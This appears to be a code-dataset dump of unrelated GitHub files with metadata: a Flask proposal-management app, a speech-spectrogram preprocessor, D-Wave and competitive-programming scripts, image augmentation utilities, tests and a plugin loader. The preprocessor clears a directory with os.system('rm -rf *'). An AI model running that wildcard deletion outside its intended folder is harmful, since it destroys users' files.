1\n\nwhile continued:\n\n text = ''.join(random.sample(input_text, len(input_text)))\n\n for letter in text:\n hash_result += hash_dict[letter] * pow(a, powered)\n powered += 1\n\n hash_result = hash_result % m\n\n for key, value in hash_text_dict.items():\n if value == hash_result:\n print(text, key)\n continued = False\n break\n\n hash_text_dict[text] = hash_result\n\n powered = 0\n hash_result = 0\n","repo_name":"zolcsika71/JBA_Python","sub_path":"Duplicate File Handler/temp/polynomial_hash.py","file_name":"polynomial_hash.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24449122514","text":"from django.urls import path\n\nfrom api.user.views import GetCurrentUser\n\napp_name = 'user'\n\nurlpatterns = [\n # path(\n # route='/',\n # view=UserProfileGetUpdateDeleteView.as_view(),\n # name='get_user_profile',\n # ),\n path(\n route='',\n view=GetCurrentUser.as_view(),\n name='get_request_user',\n )\n]\n","repo_name":"Dar0n/trackapps","sub_path":"backend/project/api/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16037705024","text":"\"\"\"\n Pre-process speech-to-command dataset\n\n Preprocessed data are saved to FedTuning/Download/speech_command/_FedTuning/\n\"\"\"\n\nimport os\nimport pathlib\nimport glob\nimport re\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport skimage.io\nimport librosa\n\n\n# dataset 
name\ndataset_name = 'speech_command'\n\n# absolute path to FedTuning/Download/\ndownload_dir = os.path.join(pathlib.Path(__file__).resolve().parents[2], 'Download')\n\n# absolute path to FedTuning/Download/speech_command\ndataset_dir = os.path.join(download_dir, dataset_name)\nif not os.path.isdir(dataset_dir):\n print(f'Error: dataset directory {dataset_dir} does not exist')\n exit(-1)\n\n# absolute path to store pre-processed data. FedTuning/Download/speech_command/_FedTuning\ndataset_fedtuning_dir = os.path.join(dataset_dir, '_FedTuning')\n\n# users for validation and testing; the rest are for training\nvalidation_list_file = 'validation_list.txt'\ntesting_list_file = 'testing_list.txt'\n\n# user ids for train, valid, and test\n# set() is better than dict{} in this case, but anyway, it works...\nuser_train_dict = {}\nuser_valid_dict = {}\nuser_test_dict = {}\n\n# Users for validation\nwith open(os.path.join(dataset_dir, validation_list_file), 'r') as f_in:\n lines = f_in.readlines()\n for line in lines:\n user_id = re.split('[/_]', line)[-3]\n user_valid_dict[user_id] = user_valid_dict.get(user_id, 0) + 1\n\n# Users for testing\nwith open(os.path.join(dataset_dir, testing_list_file), 'r') as f_in:\n lines = f_in.readlines()\n for line in lines:\n user_id = re.split('[/_]', line)[-3]\n user_test_dict[user_id] = user_test_dict.get(user_id, 0) + 1\n\n# Users for training\nroot_dir, data_dirs = next(os.walk(dataset_dir))[:2]\nfor data_dir in data_dirs:\n\n # ignore _background_noise_ folder, and _FedTuning folder\n if data_dir.startswith(\"_\"):\n continue\n\n data_dir_path = os.path.join(root_dir, data_dir)\n wav_files = glob.glob(os.path.join(data_dir_path, '*.wav'))\n\n for wav_file in wav_files:\n user_id = re.split('[/_]', wav_file)[-3]\n if user_id in user_valid_dict or user_id in user_test_dict:\n continue\n else:\n user_train_dict[user_id] = user_train_dict.get(user_id, 0) + 1\n\n# change working directory to {dataset_dir}\nos.chdir(dataset_dir)\nif not os.path.isdir(os.path.join(dataset_dir, '_FedTuning')):\n os.system('mkdir _FedTuning')\n\n# change working directory to {dataset_fedtuning_dir}, i.e., {dataset_dir}/_FedTuning/\nos.chdir(dataset_fedtuning_dir)\n# delete all files in directory\nos.system('rm -rf *')\n# create folders for train, valid, and test\nos.system('mkdir train test valid')\n\n# Pre-processing happens here: convert wav to spectrogram and then image, save to corresponding train, valid, and test\nroot_dir, data_dirs = next(os.walk(dataset_dir))[:2]\nfor data_dir in data_dirs:\n\n # save spectrogram to image\n def spectrogram_image(y, sr, out, hop_length, n_mels):\n def scale_minmax(X, min=0.0, max=1.0):\n X_std = (X - X.min()) / (X.max() - X.min())\n X_scaled = X_std * (max - min) + min\n return X_scaled\n\n # use log-melspectrogram\n mels = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=n_mels,\n n_fft=hop_length * 2, hop_length=hop_length)\n mels = np.log(mels + 1e-9) # add small number to avoid log(0)\n\n # min-max scale to fit inside 8-bit range\n img = scale_minmax(mels, 0, 255).astype(np.uint8)\n img = np.flip(img, axis=0) # put low frequencies at the bottom in image\n img = 255 - img # invert. 
make black==more energy\n\n # save as jpg\n skimage.io.imsave(out, img)\n\n # ignore _background_noise_ folder and _FedTuning\n if data_dir.startswith(\"_\"):\n continue\n\n data_dir_path = os.path.join(root_dir, data_dir)\n wav_files = glob.glob(os.path.join(data_dir_path, \"*.wav\"))\n\n for wav_file in wav_files:\n wav_file_split = re.split('[/_\\.]', wav_file)\n\n user_id = wav_file_split[-4]\n # e.g., bird_nohash_0.jpg\n image_out_filename = (wav_file_split[-5] + '_'\n + wav_file_split[-3] + '_'\n + wav_file_split[-2] + '.jpg')\n\n n_mels = 64\n n_time_steps = 63\n hop_length = 256\n\n y, sr = librosa.load(wav_file, sr=16000)\n y = np.concatenate((y[:n_time_steps * hop_length], [0] * (n_time_steps * hop_length - len(y))))\n\n # main workload\n if user_id in user_train_dict:\n user_dir = os.path.join(dataset_fedtuning_dir, 'train', user_id)\n if not os.path.isdir(user_dir):\n os.system('mkdir {}'.format(user_dir))\n img_file = os.path.join(user_dir, image_out_filename)\n print(f'{wav_file} -> {img_file}')\n spectrogram_image(y, sr=sr, out=img_file, hop_length=hop_length, n_mels=n_mels)\n elif user_id in user_valid_dict:\n user_dir = os.path.join(dataset_fedtuning_dir, 'valid', user_id)\n if not os.path.isdir(user_dir):\n os.system('mkdir {}'.format(user_dir))\n img_file = os.path.join(user_dir, image_out_filename)\n print(f'{wav_file} -> {img_file}')\n spectrogram_image(y, sr=sr, out=img_file, hop_length=hop_length, n_mels=n_mels)\n else:\n user_dir = os.path.join(dataset_fedtuning_dir, 'test', user_id)\n if not os.path.isdir(user_dir):\n os.system('mkdir {}'.format(user_dir))\n img_file = os.path.join(user_dir, image_out_filename)\n print(f'{wav_file} -> {img_file}')\n spectrogram_image(y, sr=sr, out=img_file, hop_length=hop_length, n_mels=n_mels)\n\nprint('Done!')\n","repo_name":"dtczhl/FedTuning","sub_path":"Dataset/speech_command/speech_command_preprocess.py","file_name":"speech_command_preprocess.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34200525769","text":"import sys\nfrom collections import deque, Counter\nsys.setrecursionlimit(5 * 10 ** 5)\n# from pypyjit import set_param\n# set_param('max_unroll_recursion=-1')\ninput = lambda: sys.stdin.readline().rstrip()\nii = lambda: int(input())\nmi = lambda: map(int, input().split())\nli = lambda: list(mi())\ninf = 2 ** 63 - 1\n\n\n\ndef solve(N: int):\n e = N\n s = 1\n while True:\n if e-s <= 1:\n break\n h = (e+s)//2\n print(f\"? {h}\", flush=True)\n ret =ii()\n if ret ==0:\n s = h\n else:\n e = h\n print(f'! 
{s}')\n\ndef main():\n N = ii() # type: int\n solve(N)\n return\n\nmain()\n","repo_name":"masahiro-999/atcoder-workspace","sub_path":"abc299/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39286861163","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nmodule: utils for skin cancer\r\nmodule author: Christoph Doerr\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport shutil\r\nimport os.path\r\nimport os\r\nfrom pathlib import Path\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ndef identify_duplicates(x, metadata):\r\n \"\"\" Identify melanoma ids with multiple images\r\n Input metadata: pandas data series \r\n \"\"\"\r\n unique_list = list(metadata)\r\n \r\n if x in unique_list:\r\n return 'no_duplicates'\r\n else:\r\n return 'has_duplicates'\r\n \r\ndef identifyValidationRows(x, metadata_val):\r\n \"\"\" Identify Rows that represent validation data\r\n Input metadata_val: pandas data series of validation data\r\n \"\"\"\r\n val_list = list(metadata_val)\r\n \r\n if str(x) in val_list:\r\n return 'val'\r\n else:\r\n return 'train'\r\n \r\ndef copyImagetoLabelFolder(metadata, metadata_train, metadata_val, figure_path, train_dir, val_dir):\r\n \"\"\"Set up training directories with images\r\n Input metadata_train: pandas data series of training data\r\n Input metadata_val: pandas data series of validation data\r\n Input figure_path: general image directory \r\n Input train_dir: training directory\r\n Input val_dir: validation directory\r\n \"\"\"\r\n print('Copying images ...')\r\n train_list = list(metadata_train['image_id'])\r\n val_list = list(metadata_val['image_id'])\r\n metadata.set_index('image_id', inplace=True)\r\n for image_id in train_list: \r\n fname = image_id + '.jpg'\r\n label = metadata.loc[image_id,'dx']\r\n src = '{}{}'.format(figure_path, fname)\r\n dst = '{}{}/{}'.format(train_dir, label, fname)\r\n shutil.copyfile(src, dst)\r\n for image_id in val_list: \r\n fname = image_id + '.jpg'\r\n label = metadata.loc[image_id,'dx']\r\n src = '{}{}'.format(figure_path, fname)\r\n dst = '{}{}/{}'.format(val_dir, label, fname)\r\n shutil.copyfile(src, dst)\r\n print('... 
done copying images !!!')\r\n\r\ndef dataAugmentation(class_list, data_path, train_dir, total_number_images=6000, target_size=(224,224), batch_size=50):\r\n '''\r\n Input class_list: list with class names\r\n Input data_path: general data directory\r\n Input train_dir: training directory\r\n Input total_number_images: total number of images that shall be created\r\n Input target_size: target size of image augmentation\r\n Input batch_size: batch size of image augmentation\r\n '''\r\n print('Augmenting images ...')\r\n for img_class in class_list:\r\n print('Creating data for {} label'.format(img_class))\r\n aug_dir = '{}aug_dir/{}'.format(data_path, img_class)\r\n Path(aug_dir).mkdir(parents=True, exist_ok=True)\r\n img_dir = os.path.join(aug_dir, 'img_dir')\r\n Path(img_dir).mkdir(parents=True, exist_ok=True)\r\n img_list = os.listdir(train_dir + img_class) \r\n for fname in img_list:\r\n src = os.path.join(train_dir + img_class, fname)\r\n dst = os.path.join(img_dir, fname)\r\n shutil.copyfile(src, dst) \r\n datagen = ImageDataGenerator(\r\n rotation_range=180,\r\n width_shift_range=0.1,\r\n height_shift_range=0.1,\r\n zoom_range=0.1,\r\n horizontal_flip=True,\r\n vertical_flip=True,\r\n #brightness_range=(0.9,1.1),\r\n fill_mode='nearest')\r\n aug_datagen = datagen.flow_from_directory(aug_dir,\r\n save_to_dir=train_dir + img_class,\r\n save_format='jpg',\r\n target_size=target_size,\r\n batch_size=batch_size) \r\n num_files = len(os.listdir(img_dir))\r\n num_batches = int(np.ceil((total_number_images-num_files)/batch_size))\r\n for i in range(0,num_batches):\r\n imgs, labels = next(aug_datagen) \r\n shutil.rmtree(aug_dir) \r\n print('... done augmenting images !!!')\r\n\r\ndef checkDataVolume(path):\r\n \"\"\" Print the number of images per skin lesion class\r\n Input path: directory that contains one subfolder per class label\r\n \"\"\"\r\n print(len(os.listdir('{}nv'.format(path))))\r\n print(len(os.listdir('{}mel'.format(path))))\r\n print(len(os.listdir('{}bkl'.format( path))))\r\n print(len(os.listdir('{}bcc'.format( path))))\r\n print(len(os.listdir('{}akiec'.format( path))))\r\n print(len(os.listdir('{}vasc'.format( path))))\r\n print(len(os.listdir('{}df'.format( path))))","repo_name":"chrisy-d1989/skin_cancer","sub_path":"utils_skincancer.py","file_name":"utils_skincancer.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"639644617","text":"f = open(\"RCV_Tri\",\"w\")\n\nwords = open( \"RCV-Tri2\", \"r\" ).readlines()\nimport re;\nfor t in words:\n\tt = t.strip('(')\n\tt = t.replace(')','')\n\tm = t.split(',')\n\tmt = m[0]\n\tf.write(mt[1:-3] + \" : \" + m[1])\t\nf.close()","repo_name":"karenke/NLP","sub_path":"LM/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29248655486","text":"from unittest.mock import MagicMock, patch\n\nfrom django.test import TestCase\nfrom bs4 import BeautifulSoup\n\nfrom core.scrapping import PortalScrapper\n\n\nclass PortalScrapperTests(TestCase):\n def test_init_error(self):\n self.assertRaises(TypeError, PortalScrapper)\n\n @patch('core.scrapping.request_page', return_value=MagicMock(content='oi'))\n def test_load_soup(self, mocked_request_page):\n 
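# request_page is patched out above, so load_soup should build its soup from\n # the mocked response content rather than performing a real HTTP request\n 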
self.assertIsInstance(mocked_request_page, MagicMock)\n mock = MagicMock(url='http://www.google.com.br/', load_soup=PortalScrapper.load_soup)\n mock.load_soup(mock)\n self.assertIsInstance(mock.page, BeautifulSoup)\n mocked_request_page.assert_called_once_with('http://www.google.com.br/')\n","repo_name":"rodrigondec/rctech","sub_path":"core/tests/test_portal_scrapper.py","file_name":"test_portal_scrapper.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74044717479","text":"import numpy as np\nfrom numpy.random import rand\n\nfrom dwave.system.samplers import DWaveSampler\nfrom dwave.system.composites import EmbeddingComposite\nfrom minorminer import find_embedding\nimport networkx as nx\nimport dwave.inspector\n\ndim=50\nQ = 2*rand(dim,dim) - 1\nQ = (Q+Q.T)/2\nfor k in range(dim):\n Q[k,k] = np.abs(Q[k,k])\n\nprint(Q)\n\nlinear={('a'+str(k), 'a'+str(k)):Q[k][k] for k in range(dim)}\n\nquadratic={('a'+str(i+1), 'a'+str(j)):Q[i+1][j] for i in range(dim-1) for j in range(dim-1) if j= 0 and r < N and c >= 0 and c < N and map[r][c].isdigit()\n\nfor row in range(N):\n for col in range(N):\n if map[row][col] == '.':\n answer = 0\n for move in MOVE:\n [dr, dc] = move\n if isBoom(row+dr, col+dc):\n answer += int(map[row+dr][col+dc])\n print('M', end='') if answer >= 10 else print(answer, end='')\n else:\n print('*', end='')\n print()","repo_name":"Handonggon/coding_test","sub_path":"백준/Silver/1996_지뢰 찾기/hdg.py","file_name":"hdg.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6170688191","text":" # Enumurate\n# Enumurate is a function that returns a tuple containing a count/index (from start which defaults to 0)\n# and the values obtained from iterating over sequence:\n\n \na = [21,23,24,25,53,56,56,87,9,90,76]\n\nfor m in enumerate (a): # tupe containing two numbers will store in m.\n print(m)\n break\n\n\n \nfor i, m in enumerate (a): # tuple khul jay ga, aur donon values i aur m mein chali jaein gi\n if (i == 4):\n print(m)\n break\n \n\n ","repo_name":"mahsanshoaib1/python-a-complete-guide","sub_path":"day_18.py","file_name":"day_18.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71428159719","text":"import json\nimport os\nimport shutil\nfrom datetime import datetime\n\nimport pypandoc\nfrom flask import render_template, redirect, request, url_for, g, flash, send_from_directory, Response\nfrom flask_babel import _, get_locale\nfrom flask_login import current_user, login_required\nfrom werkzeug.utils import secure_filename\n\nfrom app import db\nfrom app.custom_libs.highcharts_lib import to_highchart, to_gantt_highchart, to_map_highchart\nfrom app.custom_libs.print_lib import ProposalText\nfrom app.custom_libs.tables_lib import get_WP_table, get_budget_table, get_WPeffort_table, \\\n get_proposal_deliverable_table, \\\n get_proposal_milestone_table\nfrom app.custom_libs.trello_lib import send_proposal_to_trello\nfrom app.custom_libs.utilities_lib import add_admin_user, add_proposal_statuses, requires_access_level, role_required, \\\n color_diff, create_folder, make_tree\nfrom app.main import bp\nfrom app.main.forms import ProposalForm, ParticipantForm, UserPermissionForm, \\\n UploadForm\nfrom app.models import Proposal, Company, ProposalStatus, date_format, ACCESS, User, 
ROLES\n\n\n@bp.app_template_filter()\ndef show_diff_table(change):\n diff = color_diff(change)\n return '
    ' + ''.join(diff) + '
    '\n\n\n@bp.before_app_request\ndef before_request():\n g.user = current_user\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n g.locale = str(get_locale())\n add_admin_user()\n add_proposal_statuses()\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@bp.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n proposals = Proposal.query.all()\n return render_template('index.html', title=_('Home'), proposals=proposals)\n\n\n# Proposal\n\n@bp.route('/add_proposal', methods=['GET', 'POST'])\n@login_required\n@requires_access_level(ACCESS['admin'])\ndef add_proposal():\n form = ProposalForm(request.form)\n if form.validate_on_submit():\n data = request.form.to_dict()\n date_obj = datetime.strptime(data['start_date'], date_format)\n proposal = Proposal(acronym=data['acronym'], title=data['title'], description=data['description'],\n budget=data['budget'], indirect_costs_rate=int(data['indirect_costs_rate_percent']) / 100,\n call=data['call'], start_date=date_obj, duration_months=data['duration_months'],\n topic=data['topic'],\n status=ProposalStatus.get_status(data['status']), action_type=data['action_type'])\n flash_message = 'Your proposal has been added!'\n try:\n db.session.add(proposal)\n db.session.commit()\n except Exception as inst:\n flash_message = f'error! {inst}'\n flash(flash_message)\n proposal.add_user(current_user, role=ROLES['responsible'])\n return redirect(url_for('main.index'))\n return render_template('quick_form.html', title='Add Proposal', form=form)\n\n\n@bp.route('//dashboard', methods=['GET'])\n@role_required('read_only')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef dashboard(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n series, series_drilldown = proposal.serialise_budget()\n chart = to_highchart(graphtype='pie', series=series, series_drilldown=series_drilldown, title='Budget Shares',\n subtitle='Click the slices to view the budget detail')\n wp_table = get_WP_table(proposal_acronym)\n effort_table = get_WPeffort_table(proposal_acronym)\n budget_table = get_budget_table(proposal_acronym)\n deliverables_table = get_proposal_deliverable_table(proposal_acronym)\n milestones_table = get_proposal_milestone_table(proposal_acronym)\n gantt = to_gantt_highchart(proposal.get_gantt_data(), 'Gantt Chart')\n map = to_map_highchart(proposal.get_map_data(), 'Participants Geographical Distribution')\n tree = make_tree(create_folder(proposal_acronym))\n return render_template('dashboard.html', proposal=proposal, chart=chart, gantt=gantt, wp_table=wp_table,\n budget_table=budget_table, effort_table=effort_table, deliverables_table=deliverables_table,\n milestones_table=milestones_table, map=map, tree=tree)\n\n\n@bp.route('//edit', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef edit_proposal(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n form = ProposalForm(request.form, obj=proposal)\n if form.validate_on_submit():\n data = request.form.to_dict()\n proposal.update(data)\n flash_message = 'Your proposal has been modified successfully!'\n try:\n db.session.commit()\n except Exception as inst:\n flash_message = f'error! 
{inst}'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Edit Proposal', form=form)\n\n\n@bp.route('//delete', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['admin'])\n@login_required\ndef delete_proposal(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n folder = create_folder(proposal_acronym)\n shutil.rmtree(folder, ignore_errors=True)\n proposal.delete()\n flash_message = 'Your proposal has been deleted!'\n try:\n db.session.commit()\n except Exception as inst:\n flash_message = f'error! {inst}'\n flash(flash_message)\n\n\n# Exporting\n\n@bp.route('//export', methods=['GET', 'POST'])\n@role_required('edit')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef export_proposal(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n if request.args:\n format = request.args['format']\n else:\n format = ''\n text = ProposalText(proposal)\n filename = text.write_description()\n new_filename = os.path.splitext(filename)[0] + f'.{format}'\n pypandoc.convert_file(filename, format, outputfile=new_filename)\n os.remove(filename)\n return send_from_directory(directory=os.path.dirname(new_filename), filename=os.path.basename(new_filename),\n as_attachment=True)\n\n\n# Participants\n\n\n@bp.route('//add_participant', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef add_participant(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n form = ParticipantForm.new(obj=None)\n d_temp = {'y': True, 'n': False}\n if form.validate_on_submit():\n data = request.form.to_dict()\n if 'is_coordinator' not in data:\n data['is_coordinator'] = 'n'\n proposal.add_participant(Company.get_company_acronym(data['participant']),\n personnel_cost=data['personnel_cost'],\n subcontracting_cost=data['subcontracting_cost'],\n is_coordinator=d_temp[data['is_coordinator']],\n participant_number=data['participant_number'],\n other_direct_costs=data['other_direct_costs'],\n proposal_related_text=data['proposal_related_text'])\n flash_message = 'The proposal has been correctly modified!'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Add Participant', form=form)\n\n\n@bp.route('//edit_participant/', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef edit_participant(proposal_acronym, company_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n participant = proposal.get_participant(Company.get_company_acronym(company_acronym))\n form = ParticipantForm.new(obj=participant, company=participant.company)\n d_temp = {'y': True, 'n': False}\n if form.validate_on_submit():\n data = request.form.to_dict()\n if 'is_coordinator' not in data:\n data['is_coordinator'] = 'n'\n proposal.add_participant(Company.get_company_acronym(data['participant']),\n personnel_cost=data['personnel_cost'],\n subcontracting_cost=data['subcontracting_cost'],\n is_coordinator=d_temp[data['is_coordinator']],\n participant_number=data['participant_number'],\n other_direct_costs=data['other_direct_costs'],\n proposal_related_text=data['proposal_related_text'])\n flash_message = 'The proposal has been correctly modified!'\n flash(flash_message)\n return 
redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Edit Participant', form=form)\n\n\n@bp.route('/<proposal_acronym>/remove_participant/<company_acronym>', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef remove_participant(proposal_acronym, company_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n proposal.remove_participant(Company.get_company_acronym(company_acronym))\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n\n\n# Users\n\n@bp.route('/<proposal_acronym>/add_user', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef add_user(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n form = UserPermissionForm.new()\n if form.validate_on_submit():\n data = request.form.to_dict()\n proposal.add_user(User.query.filter_by(username=data['user']).first(), role=int(data['role']))\n flash_message = 'The user has been correctly added to the proposal!'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n return render_template('quick_form.html', title='Add User', form=form)\n\n\n@bp.route('/<proposal_acronym>/remove_user/<username>', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef remove_user(proposal_acronym, username):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n proposal.remove_user(User.query.filter_by(username=username).first())\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n\n\n# Files\n\n@bp.route(\"/<proposal_acronym>/downloads/<filename>\", methods=['GET', 'POST'])\n@role_required('read_only')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef get_file(proposal_acronym, filename):\n \"\"\"Download a file.\"\"\"\n folder = create_folder(proposal_acronym)\n return send_from_directory(directory=folder, filename=filename, as_attachment=True)\n\n\n@bp.route(\"/<proposal_acronym>/delete/<filename>\", methods=['GET', 'POST'])\n@role_required('edit')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef delete_file(proposal_acronym, filename):\n \"\"\"Delete a file.\"\"\"\n folder = create_folder(proposal_acronym)\n if os.path.exists(os.path.join(folder, filename)):\n os.remove(os.path.join(folder, filename))\n flashmessage = f'The file \"{filename}\" has been deleted'\n else:\n flashmessage = f'The file \"{filename}\" does not exist'\n flash(flashmessage)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal_acronym))\n\n\n@bp.route(\"/<proposal_acronym>/upload\", methods=['GET', 'POST'])\n@role_required('edit')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef upload_file(proposal_acronym):\n folder = create_folder(proposal_acronym)\n form = UploadForm()\n if form.validate_on_submit():\n if request.method == 'POST':\n # check if the post request has the file part\n f = form.submitted_file.data\n filename = secure_filename(f.filename)\n uploaded_file = os.path.join(folder, filename)\n f.save(uploaded_file)\n flash_message = 'File correctly submitted'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal_acronym))\n return render_template('quick_form.html', title='Submit File', form=form)\n\n\n# Changelog\n\n@bp.route('/<proposal_acronym>/restore_version/<version_index>', methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef restore_proposal_version(proposal_acronym, 
version_index):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n version = proposal.versions[int(version_index)]\n version.revert()\n db.session.commit()\n flash_message = f'Proposal restored to version {version_index}'\n flash(flash_message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n\n\n@bp.route(\"/<proposal_acronym>/changelog\", methods=['GET', 'POST'])\n@role_required('read_only')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef proposal_changelog(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n return render_template('changelog.html', proposal=proposal)\n\n\n### Trello\n@bp.route(\"/<proposal_acronym>/totrello\", methods=['GET', 'POST'])\n@role_required('responsible')\n@requires_access_level(ACCESS['user'])\n@login_required\ndef submit_to_trello(proposal_acronym):\n proposal = Proposal.get_proposal_acronym(proposal_acronym)\n ## Execute in thread - currently not working due to a db problem\n # user = User.query.filter_by(username=current_user.username).first()\n # Thread(target=execute_send_trello,\n # args=(current_app._get_current_object(), proposal, user)).start()\n if current_user.trello_token and current_user.trello_api_key:\n message = send_proposal_to_trello(proposal=proposal, user=current_user)\n flash(message)\n return redirect(url_for('main.dashboard', proposal_acronym=proposal.acronym))\n else:\n flash('Please set your Trello user API key and token')\n return redirect(url_for('main.user_panel', username=current_user.username))\n\n\n\n### Autocomplete\n\n@bp.route('/_autocomplete/<item>', methods=['GET'])\ndef autocomplete(item):\n if item == 'topic':\n return Response(json.dumps(Proposal.get_topics_list()), mimetype='application/json')\n elif item == 'call':\n return Response(json.dumps(Proposal.get_calls_list()), mimetype='application/json')\n","repo_name":"vitofico/proposals-planner","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":14854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6918594272","text":"import os.path\nimport importlib.util\nimport hashlib\nimport sys\nimport traceback\n\nfrom ..errors import InputValidationException\n\n\n__all__ = [\"PythonPluginSystem\"]\n\n\nclass PythonPluginSystem(object):\n \"\"\"\n Loads Python Packages, using entry point discovery or from a custom\n search path. If they expose a top-level 'plugin' attribute that\n holds a class derived from PythonPluginSystemPlugin, it will be\n registered with its identifier. Once a plug-in has registered an\n identifier, any subsequent registrations with that id will be\n skipped.\n \"\"\"\n\n __validModuleExtensions = (\".py\", \".pyc\")\n\n def __init__(self, logger):\n self.__logger = logger\n self.reset()\n\n def reset(self):\n \"\"\"\n Clears any previously loaded plugins.\n \"\"\"\n self.__map = {}\n self.__paths = {}\n\n def scan(self, paths):\n \"\"\"\n Searches the supplied paths for modules that define a\n PythonPluginSystemPlugin through a top-level `plugin` variable.\n\n Paths are searched right-to-left, but only the first instance of\n any given plugin identifier will be used, and subsequent\n registrations ignored. 
This means entries to the left of the\n paths list take precedence over ones to the right.\n\n @note Precedence order is undefined for plugins sharing the\n same identifier within the same directory.\n\n @param paths `str` A list of paths to search, delimited by\n `os.pathsep`.\n \"\"\"\n self.__logger.debug(f\"PythonPluginSystem: Searching {paths}\")\n\n for path in paths.split(os.pathsep):\n if not os.path.isdir(path):\n self.__logger.debug(f\"PythonPluginSystem: Skipping as not a directory {path}\")\n continue\n\n for item in os.listdir(path):\n itemPath = os.path.join(path, item)\n\n if os.path.isdir(itemPath):\n # The directory could be a package, check for __init__.py\n initFile = os.path.join(itemPath, \"__init__.py\")\n if os.path.exists(initFile):\n itemPath = initFile\n else:\n self.__logger.debug(\n \"PythonPluginSystem: Ignoring as it is not a python package \"\n f\"containing __init__.py {itemPath}\"\n )\n continue\n else:\n # It's a file, check if it is a .py/.pyc module\n _, ext = os.path.splitext(itemPath)\n if ext not in self.__validModuleExtensions:\n self.__logger.debug(\n f\"PythonPluginSystem: Ignoring as it's not a python module {itemPath}\"\n )\n continue\n\n self.__logger.debug(f\"PythonPluginSystem: Attempting to load {itemPath}\")\n\n self.__load(itemPath)\n\n def scan_entry_points(self, entryPointName):\n \"\"\"\n Searches packages for entry points that define a\n PythonPluginSystemPlugin through a top-level `plugin` variable.\n\n @note The order of discovery is determined by `importlib`, only\n the first plugin with any given identifier will be registered.\n\n @param entryPointName `str` The entry point name to search for\n (see: importlib_metadata.entry_points group).\n\n @returns True if entry point discovery is possible, False if\n there was a problem loading importlib_metadata.\n \"\"\"\n\n # We opt to use the backport implementation of modern importlib to avoid\n # needing to support 3+ code paths to cover Python 3.7 to 3.10. 
